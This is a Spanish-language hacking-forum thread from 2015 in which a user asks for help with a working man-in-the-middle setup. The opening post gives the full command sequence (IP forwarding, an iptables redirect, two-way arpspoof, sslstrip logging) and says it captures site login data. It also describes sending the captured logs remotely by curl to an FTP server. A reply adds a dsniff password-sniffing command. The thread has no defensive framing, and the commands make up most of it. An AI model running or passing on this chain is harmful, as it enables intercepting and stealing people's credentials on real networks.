elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ayuda con arpspoof y sslstrip.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con arpspoof y sslstrip.  (Leído 3,067 veces)
passgpc

Desconectado Desconectado

Mensajes: 2


Ver Perfil
ayuda con arpspoof y sslstrip.
« en: 20 Octubre 2015, 22:39 pm »

Hola, Mi nombre es Guillermo y recurro a esta pagina y a sus miembros para pedir ayuda con un problema que no entiendo de donde proviene, cuando hago un mitm entre la pc cliente y el router con los comandos:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i eth0 -t ip_switch_victima ip_router
arpspoof -i eth0 -t ip_router ip_pc_victima
sslstrip -k -l 8080 -w /archivo.log

estos me funcionan de maravilla capturando los datos de acceso de las paginas, pero el inconveniente que surge es que tambien captura mucha basura de paginas chinas y no entiendo el porque, si el mitm lo estoy realizando entre el router y el switch victima solo eso tendria que ver, el swicth victima que para ingresar se usa su propia pagina web y que redirijo hacia el 8080 que es el escucha del sslstrip, como he dicho antes, funciona pero no se como quitar la informacion inecesaria que se graba en el archivo y hace que pese varios megas, hice un ensayo cambiando el puerto de redireccion y tampoco deja de capturar basura, utilice el comando:

dsniff -t 23/tcp=telnet -n

que en teoria deberia solo capturar lo del puerto 23 de telnet y en este caso lo hace, pero tambien como el ejm anterior captura muchisima basura...

Por favor si alguien me puede ayudar le estare agradecido, me genera archivos de mas de 100 megas, y no es logico ya que es solo la comunicacion de la pagina web del swicht y el router, al hacer esto remotamente y enviarlo con el comando curl a un ftp me deja vulnerable a que alguien con wireshark detecte mis credenciales de entrada al ftp, gracias.
En línea

jsuperh

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: ayuda con arpspoof y sslstrip.
« Respuesta #1 en: 26 Octubre 2015, 23:42 pm »

Con esto puedes obtener lo escencial
# sniffar passwords
nohup dsniff -i eth0 >/tmp/dsniff.log &
En línea

passgpc

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: ayuda con arpspoof y sslstrip.
« Respuesta #2 en: 27 Octubre 2015, 03:34 am »

Gracias por tu respuesta, he realizado lo que me has sugerido pero me sale este mensaje:

nohup: ignoring input and redirecting stderr to stdout

y no escribe nada en el archivo, que debo hacer ?, gracias.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda ettercap+sslstrip
Hacking
wampis 3 6,007 Último mensaje 22 Septiembre 2011, 10:17 am
por ChimoC
Ayuda con duda SSLStrip
Hacking
baran0wa 1 3,793 Último mensaje 29 Junio 2011, 04:05 am
por y0g-s0th0th
sslstrip & arpspoof (cerrar conexión) « 1 2 3 »
Hacking
rigg 20 17,472 Último mensaje 4 Enero 2012, 04:44 am
por thedevilini
mitm con sslstrip y arpspoof. ayuda
Hacking
zit0 0 4,668 Último mensaje 29 Diciembre 2012, 22:33 pm
por zit0
ARPspoof + SslStrip
Hacking
karrax 7 6,939 Último mensaje 18 Agosto 2014, 12:36 pm
por faddlenope
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines